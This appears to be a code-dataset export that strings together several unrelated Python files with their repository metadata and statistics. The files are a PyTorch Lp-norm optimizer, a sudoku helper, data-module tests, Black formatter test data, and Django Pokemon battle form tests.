lp = net_lp[i]
if lp is not None:
# this is the update of normalized weight
# update feature vector
w = p.data
if 'feature_vec' not in param_state:
ftv = param_state['feature_vec'] = w.sign().mul(w.abs().pow(lp-1))
else:
ftv = param_state['feature_vec']
d_pc, inv_norm_d = myF.LpNormalize_cnn(d_p, lp, lp-1)
ftv = ftv.mul(1-cur_lr).add(-cur_lr, d_pc)
ftv, _ = myF.LpNormalize_cnn(ftv, lp, lp - 1)
param_state['feature_vec'] = ftv
p.data = ftv.sign().mul(ftv.abs().pow(1/(lp - 1)))
else:
# this is bias and other parameters
b = p.data
b.add_(-cur_lr, d_p)
return loss
class LpCGDw(Optimizer):
r"""Implements Lp constrained gradient descent (optionally with momentum).
This version directly update the weight instead of updating the feature vector defined as:
v(w)=w^(p-1)
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
net_lp (list): Lp norm of weight for each layer
lr (float): learning rate
lr_decay (float): decay of learning rate (default: 0)
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
"""
def __init__(self, model, net_lp, lp_layers: list = ['conv', 'fc'], forbid_layers: int = 1,
lr=required, lr_decay=0, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
# other set
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if lr_decay < 0.0:
raise ValueError("Invalid lr_decay rate: {}".format(lr_decay))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, lr_decay=lr_decay, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
# get the namelist of parameters
self.sum_iter = 0
self.general_norm = 1
self.net_lp = net_lp
self.lp_layers = lp_layers
self.forbid_layers = forbid_layers
namelist = []
for name, param in model.named_parameters():
namelist.append(name)
self.name_list = namelist
super(LpCGDw, self).__init__(model.parameters(), defaults)
self.weightNormalize()
def weightNormalize(self):
# normalized weight
# fill the lp for normalization
layer_n = len(self.name_list)
net_lp = [None] * layer_n
count = 0
for i, name in enumerate(self.name_list):
if i >= layer_n - self.forbid_layers:
break
if (True in [lp_layer in name for lp_layer in self.lp_layers]) and 'weight' in name:
net_lp[i] = self.net_lp[count]
count += 1
self.net_lp = net_lp
# normalized weight
for group in self.param_groups:
for i, p in enumerate(group['params']):
if p.data is None or net_lp[i] is None:
continue
cp = p.data
if cp.dim() < 2 or cp.dim() > 4:
net_lp[i] = None
continue
p.data, _ = myF.LpNormalize_cnn(cp, net_lp[i])
def __setstate__(self, state):
super(LpCGDw, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
net_lp = self.net_lp
for group in self.param_groups:
# update learning ratio
cur_lr = group['lr'] / (1 + group['lr_decay'] * self.sum_iter)
self.sum_iter += 1
# params
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for i, p in enumerate(group['params']):
# gradient
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# normalized gradient
lp = net_lp[i]
if lp is not None:
# this is weight update of convolution layer and full connected layer
# normalized weight
w = p.data
# unit gradient on p/(p-1) norm space
d_pc, inv_norm_d = myF.LpNormalize_cnn(d_p, lp, lp - 1)
# w(t+1) = (1 - lr ) * w(t) - lr * gradient ^ (1/(p-1))
d_pc = d_pc.sign().mul(d_pc.abs().pow(1 / (lp - 1)))
# update the weight
w = w.mul(1 - cur_lr).add(-cur_lr, d_pc)
p.data, _ = myF.LpNormalize_cnn(w, lp, 1)
else:
# this is bias update or other kind of weight
b = p.data
b.add_(-cur_lr, d_p)
return loss
| 37.34891
| 123
| 0.537576
| 1,440
| 11,989
| 4.308333
| 0.124306
| 0.024178
| 0.02579
| 0.021921
| 0.875403
| 0.85332
| 0.84784
| 0.839781
| 0.829142
| 0.822695
| 0
| 0.010893
| 0.372091
| 11,989
| 321
| 124
| 37.34891
| 0.813231
| 0.206189
| 0
| 0.831633
| 0
| 0
| 0.066294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.015306
| 0
| 0.076531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fdcfd222ed9c8847e9893d6828fd67532128667a
| 805
|
py
|
Python
|
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
utils.py
|
shinning91/SudokuSolverGUI
|
3ac1f6de57094e98f67525a9ebece33bba152eab
|
[
"MIT"
] | null | null | null |
def get_square_3x3(grid, row, column):
square = []
if row<3:
if column < 3:
square = [grid[i][0:3] for i in range(0, 3)]
elif column<6:
square = [grid[i][3:6] for i in range(0, 3)]
else:
square = [grid[i][6:9] for i in range(0, 3)]
elif row<6:
if column < 3:
square=[grid[i][0:3] for i in range(3,6)]
elif column < 6:
square = [grid[i][3:6] for i in range(3,6)]
else:
square=[grid[i][6:9] for i in range(3,6)]
else:
if column < 3:
square = [grid[i][0:3] for i in range(6,9)]
elif column < 6:
square = [grid[i][3:6] for i in range(6,9)]
else:
square = [grid[i][6:9] for i in range(6,9)]
return square
| 33.541667
| 56
| 0.462112
| 137
| 805
| 2.70073
| 0.138686
| 0.243243
| 0.267568
| 0.267568
| 0.848649
| 0.848649
| 0.821622
| 0.778378
| 0.778378
| 0.778378
| 0
| 0.092184
| 0.380124
| 805
| 24
| 57
| 33.541667
| 0.649299
| 0
| 0
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3084f36c82aa08c2055ae3cc2c5b2718a69076c
| 3,652
|
py
|
Python
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 9
|
2022-01-22T11:47:11.000Z
|
2022-03-08T14:49:38.000Z
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 1
|
2021-11-14T22:30:20.000Z
|
2021-11-19T14:40:49.000Z
|
neural_clbf/datamodules/tests/test_episodic_datamodule.py
|
saxenam06/neural_clbf
|
1f2a43b579330172a03f284a5673b00f0899c755
|
[
"BSD-3-Clause"
] | 5
|
2022-01-23T17:02:52.000Z
|
2022-03-29T22:26:59.000Z
|
"""Test the data generation for the f16 gcas"""
import random
from typing import Dict
import torch
from neural_clbf.datamodules.episodic_datamodule import EpisodicDataModule
from neural_clbf.systems.tests.mock_system import MockSystem
params: Dict[str, float] = {}
model = MockSystem(params)
def test_episodic_datamodule():
"""Test the EpisodicDataModule"""
# Set a random seed for repeatability
random.seed(0)
torch.manual_seed(0)
initial_domain = [
(-1.0, 1.0),
(-1.0, 1.0),
]
dm = EpisodicDataModule(
model,
initial_domain,
trajectories_per_episode=100,
trajectory_length=50,
fixed_samples=1000,
val_split=0.1,
batch_size=10,
)
assert dm is not None
# After preparing data, there should be a bunch of sample points
dm.prepare_data()
expected_num_datapoints = dm.trajectories_per_episode * dm.trajectory_length
expected_num_datapoints += dm.fixed_samples
val_pts = int(expected_num_datapoints * dm.val_split)
train_pts = expected_num_datapoints - val_pts
assert dm.x_training.shape[0] == train_pts
assert dm.x_training.shape[1] == model.n_dims
assert dm.x_validation.shape[0] == val_pts
assert dm.x_validation.shape[1] == model.n_dims
# These points should also be located in DataLoaders
assert len(dm.training_data) == train_pts
assert len(dm.validation_data) == val_pts
# Each of those things should have the appropriate number of items
# (point, goal, safe, unsafe)
for data in dm.training_data:
assert len(data) == 4
for data in dm.validation_data:
assert len(data) == 4
# Also make sure the data loaders are batched appropriately
train_dl = dm.train_dataloader()
assert len(train_dl) == round(train_pts / dm.batch_size)
val_dl = dm.val_dataloader()
assert len(val_dl) == round(val_pts / dm.batch_size)
def test_episodic_datamodule_quotas():
"""Test the EpisodicDataModule with sampling quotas"""
# Set a random seed for repeatability
random.seed(0)
torch.manual_seed(0)
initial_domain = [
(-1.0, 1.0),
(-1.0, 1.0),
]
dm = EpisodicDataModule(
model,
initial_domain,
trajectories_per_episode=100,
trajectory_length=50,
fixed_samples=1000,
val_split=0.1,
batch_size=10,
quotas={"safe": 0.1, "unsafe": 0.1, "goal": 0.1},
)
assert dm is not None
# After preparing data, there should be a bunch of sample points
dm.prepare_data()
expected_num_datapoints = dm.trajectories_per_episode * dm.trajectory_length
expected_num_datapoints += dm.fixed_samples
val_pts = int(expected_num_datapoints * dm.val_split)
train_pts = expected_num_datapoints - val_pts
assert dm.x_training.shape[0] == train_pts
assert dm.x_training.shape[1] == model.n_dims
assert dm.x_validation.shape[0] == val_pts
assert dm.x_validation.shape[1] == model.n_dims
# These points should also be located in DataLoaders
assert len(dm.training_data) == train_pts
assert len(dm.validation_data) == val_pts
# Each of those things should have the appropriate number of items
# (point, goal, safe, unsafe)
for data in dm.training_data:
assert len(data) == 4
for data in dm.validation_data:
assert len(data) == 4
# Also make sure the data loaders are batched appropriately
train_dl = dm.train_dataloader()
assert len(train_dl) == round(train_pts / dm.batch_size)
val_dl = dm.val_dataloader()
assert len(val_dl) == round(val_pts / dm.batch_size)
| 32.607143
| 80
| 0.684556
| 520
| 3,652
| 4.598077
| 0.211538
| 0.045169
| 0.070263
| 0.010038
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0.83898
| 0
| 0.023264
| 0.223165
| 3,652
| 111
| 81
| 32.900901
| 0.819528
| 0.197426
| 0
| 0.825
| 0
| 0
| 0.004821
| 0
| 0
| 0
| 0
| 0
| 0.275
| 1
| 0.025
| false
| 0
| 0.0625
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e345bb90276c709939125f2e366f45318e973486
| 267
|
py
|
Python
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 16,110
|
2019-07-22T21:54:54.000Z
|
2022-03-31T22:52:39.000Z
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 1,981
|
2019-07-22T21:26:16.000Z
|
2022-03-31T23:14:35.000Z
|
tests/data/numeric_literals_skip_underscores.py
|
StarryInternet/black
|
f90f50a7436ca13517933c290ef007e7cb2e7258
|
[
"MIT"
] | 1,762
|
2019-07-22T21:23:00.000Z
|
2022-03-31T06:10:22.000Z
|
#!/usr/bin/env python3.6
x = 123456789
x = 1_2_3_4_5_6_7
x = 1E+1
x = 0xb1acc
x = 0.00_00_006
x = 12_34_567J
x = .1_2
x = 1_2.
# output
#!/usr/bin/env python3.6
x = 123456789
x = 1_2_3_4_5_6_7
x = 1e1
x = 0xB1ACC
x = 0.00_00_006
x = 12_34_567j
x = 0.1_2
x = 1_2.0
| 11.608696
| 24
| 0.651685
| 72
| 267
| 2.083333
| 0.319444
| 0.08
| 0.1
| 0.213333
| 0.906667
| 0.84
| 0.84
| 0.84
| 0.84
| 0.84
| 0
| 0.4
| 0.213483
| 267
| 23
| 25
| 11.608696
| 0.314286
| 0.198502
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066038
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3875487749406bddcc253f97b7467b00823cde5
| 27
|
py
|
Python
|
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
djangoproject/pages/namer.py
|
dipak122/MyDjangoProject
|
e3a1bbf996f4b818d4d70eea42eb79ca662a2faa
|
[
"bzip2-1.0.6"
] | null | null | null |
def namer():
return 2+3
| 13.5
| 14
| 0.592593
| 5
| 27
| 3.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0.259259
| 27
| 2
| 14
| 13.5
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
473ea662ed0889fd47c92f4a50622573a3b8be94
| 102
|
py
|
Python
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 5
|
2020-08-31T02:02:54.000Z
|
2020-09-11T22:20:48.000Z
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 53
|
2020-09-14T04:04:43.000Z
|
2022-01-31T06:57:18.000Z
|
app/airq/management/__init__.py
|
ianhoffman/airq
|
986a5948d87169b5828b5488ea968a18d9f549db
|
[
"MIT"
] | 1
|
2020-10-03T08:18:16.000Z
|
2020-10-03T08:18:16.000Z
|
from airq.management.generate_fixtures import generate_fixtures
from airq.management.sync import sync
| 34
| 63
| 0.882353
| 14
| 102
| 6.285714
| 0.5
| 0.181818
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 102
| 2
| 64
| 51
| 0.93617
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
47872f8e7c4856376a7387b557797e7d7eb9c882
| 193
|
py
|
Python
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 1
|
2021-07-15T08:55:12.000Z
|
2021-07-15T08:55:12.000Z
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 7
|
2021-01-07T23:51:57.000Z
|
2021-12-13T19:50:57.000Z
|
syn/conf/__init__.py
|
mbodenhamer/syn
|
aeaa3ad8a49bac8f50cf89b6f1fe97ad43d1d258
|
[
"MIT"
] | 2
|
2016-07-11T08:46:31.000Z
|
2017-12-13T13:30:51.000Z
|
from .conf import *
from .conf2 import *
from .vars import *
from syn.base_utils import harvest_metadata, delete
with delete(harvest_metadata, delete):
harvest_metadata('../metadata.yml')
| 24.125
| 51
| 0.761658
| 26
| 193
| 5.5
| 0.5
| 0.20979
| 0.293706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005988
| 0.134715
| 193
| 7
| 52
| 27.571429
| 0.850299
| 0
| 0
| 0
| 0
| 0
| 0.07772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
478ee4f34522cca1893ec8c3fabd35688dafe866
| 52
|
py
|
Python
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/codeInsight/mlcompletion/haveOpeningSquareBracket.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
k1 = 1
k2 = 22
dct = {k1: "1", k2: "22"}
dct[<caret>
| 13
| 25
| 0.480769
| 11
| 52
| 2.272727
| 0.545455
| 0.24
| 0.4
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.230769
| 52
| 4
| 26
| 13
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
47a20de53e920aac9580322759efd1b5f713eeb8
| 9,452
|
py
|
Python
|
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | 4
|
2021-01-05T18:51:30.000Z
|
2021-04-07T17:03:08.000Z
|
backend/battles/tests/test_forms.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
import responses
from django.test import TestCase
from model_mommy import mommy
from battles.forms import BattleForm, BattleOpponentPokemonsForm
from common.constants import POKEAPI_BASE_URL
class BattleCreateFormTests(TestCase):
@responses.activate
def test_create_battle(self):
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon1", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon2", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon3", status=200)
pokemon_1 = mommy.make(
"pokemons.Pokemon",
poke_id=1,
name="pokemon1",
attack=49,
defense=49,
hit_points=45,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/1.png",
)
pokemon_2 = mommy.make(
"pokemons.Pokemon",
poke_id=2,
name="pokemon2",
attack=64,
defense=64,
hit_points=50,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/2.png",
)
pokemon_3 = mommy.make(
"pokemons.Pokemon",
poke_id=3,
name="pokemon3",
attack=69,
defense=69,
hit_points=55,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/3.png",
)
current_user = mommy.make("users.User")
opponent = mommy.make("users.User", email="opponent@test.com")
data = {
"opponent": opponent.id,
"creator_pokemon_1": pokemon_1.id,
"creator_pokemon_2": pokemon_2.id,
"creator_pokemon_3": pokemon_3.id,
}
form = BattleForm(data=data, current_user=current_user)
self.assertTrue(form.is_valid())
battle = form.save()
self.assertEqual(battle.creator, current_user)
self.assertEqual(battle.opponent, opponent)
self.assertEqual(battle.creator_pokemon_1.poke_id, 1)
self.assertEqual(battle.creator_pokemon_2.poke_id, 2)
self.assertEqual(battle.creator_pokemon_3.poke_id, 3)
@responses.activate
def test_cannot_create_battle_with_creator_as_opponent(self):
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon1", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon2", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon3", status=200)
pokemon_1 = mommy.make(
"pokemons.Pokemon",
poke_id=1,
name="pokemon1",
attack=49,
defense=49,
hit_points=45,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/1.png",
)
pokemon_2 = mommy.make(
"pokemons.Pokemon",
poke_id=2,
name="pokemon2",
attack=64,
defense=64,
hit_points=50,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/2.png",
)
pokemon_3 = mommy.make(
"pokemons.Pokemon",
poke_id=3,
name="pokemon3",
attack=69,
defense=69,
hit_points=55,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/3.png",
)
current_user = mommy.make("users.User")
data = {
"opponent": current_user.id,
"creator_pokemon_1": pokemon_1.id,
"creator_pokemon_2": pokemon_2.id,
"creator_pokemon_3": pokemon_3.id,
}
form = BattleForm(data=data, current_user=current_user)
self.assertFalse(form.is_valid())
self.assertIn("opponent", form.errors)
@responses.activate
def test_cannot_force_a_creator_user(self):
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon1", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon2", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon3", status=200)
pokemon_1 = mommy.make(
"pokemons.Pokemon",
poke_id=1,
name="pokemon1",
attack=49,
defense=49,
hit_points=45,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/1.png",
)
pokemon_2 = mommy.make(
"pokemons.Pokemon",
poke_id=2,
name="pokemon2",
attack=64,
defense=64,
hit_points=50,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/2.png",
)
pokemon_3 = mommy.make(
"pokemons.Pokemon",
poke_id=3,
name="pokemon3",
attack=69,
defense=69,
hit_points=55,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/3.png",
)
current_user = mommy.make("users.User")
fake_creator_user = mommy.make("users.User")
opponent = mommy.make("users.User")
data = {
"creator": fake_creator_user.id,
"opponent": opponent.id,
"creator_pokemon_1": pokemon_1.id,
"creator_pokemon_2": pokemon_2.id,
"creator_pokemon_3": pokemon_3.id,
}
form = BattleForm(data=data, current_user=current_user)
self.assertTrue(form.is_valid())
battle = form.save()
self.assertEqual(battle.creator, current_user)
@responses.activate
def test_cannot_create_battle_if_pokemon_points_sum_more_than_600(self):
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon1", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon2", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon3", status=200)
pokemon_1 = mommy.make(
"pokemons.Pokemon",
poke_id=1,
name="pokemon1",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/1.png",
)
pokemon_2 = mommy.make(
"pokemons.Pokemon",
poke_id=2,
name="pokemon2",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/2.png",
)
pokemon_3 = mommy.make(
"pokemons.Pokemon",
poke_id=3,
name="pokemon3",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/3.png",
)
current_user = mommy.make("users.User")
opponent = mommy.make("users.User", email="opponent@test.com")
data = {
"opponent": opponent.id,
"creator_pokemon_1": pokemon_1.id,
"creator_pokemon_2": pokemon_2.id,
"creator_pokemon_3": pokemon_3.id,
}
form = BattleForm(data=data, current_user=current_user)
self.assertFalse(form.is_valid())
self.assertEqual(["Pokemons' points sum cannot be more than 600"], form.errors["__all__"])
class BattleOpponentPokemonsFormTests(TestCase):
@responses.activate
def test_cannot_create_battle_if_pokemon_points_sum_more_than_600(self):
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon1", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon2", status=200)
responses.add(responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/pokemon3", status=200)
pokemon_1 = mommy.make(
"pokemons.Pokemon",
poke_id=1,
name="pokemon1",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/1.png",
)
pokemon_2 = mommy.make(
"pokemons.Pokemon",
poke_id=2,
name="pokemon2",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/2.png",
)
pokemon_3 = mommy.make(
"pokemons.Pokemon",
poke_id=3,
name="pokemon3",
attack=100,
defense=100,
hit_points=100,
image="https://raw.githubusercontent.com/"
"PokeAPI/sprites/master/sprites/pokemon/3.png",
)
data = {
"opponent_pokemon_1": pokemon_1.id,
"opponent_pokemon_2": pokemon_2.id,
"opponent_pokemon_3": pokemon_3.id,
}
form = BattleOpponentPokemonsForm(data=data)
self.assertFalse(form.is_valid())
self.assertEqual(["Pokemons' points sum cannot be more than 600"], form.errors["__all__"])
| 34.246377
| 98
| 0.583263
| 1,029
| 9,452
| 5.165209
| 0.087464
| 0.038946
| 0.042145
| 0.070555
| 0.90969
| 0.868485
| 0.864346
| 0.856444
| 0.856444
| 0.856444
| 0
| 0.041723
| 0.300148
| 9,452
| 275
| 99
| 34.370909
| 0.761754
| 0
| 0
| 0.821577
| 0
| 0
| 0.270948
| 0.123783
| 0
| 0
| 0
| 0
| 0.058091
| 1
| 0.020747
| false
| 0
| 0.020747
| 0
| 0.049793
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
47a20e61cff5232c965e6a3ea652b8ca0a24f015
| 139
|
py
|
Python
|
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | null | null | null |
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | 4
|
2018-08-24T12:49:33.000Z
|
2018-10-25T08:46:05.000Z
|
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | 3
|
2019-08-29T13:58:49.000Z
|
2021-04-10T19:41:20.000Z
|
from .whitehall import scrub_whitehall
from .email_alert_api import scrub_email_alert_api
from .publishing_api import scrub_publishing_api
| 34.75
| 50
| 0.892086
| 21
| 139
| 5.47619
| 0.380952
| 0.286957
| 0.226087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086331
| 139
| 3
| 51
| 46.333333
| 0.905512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
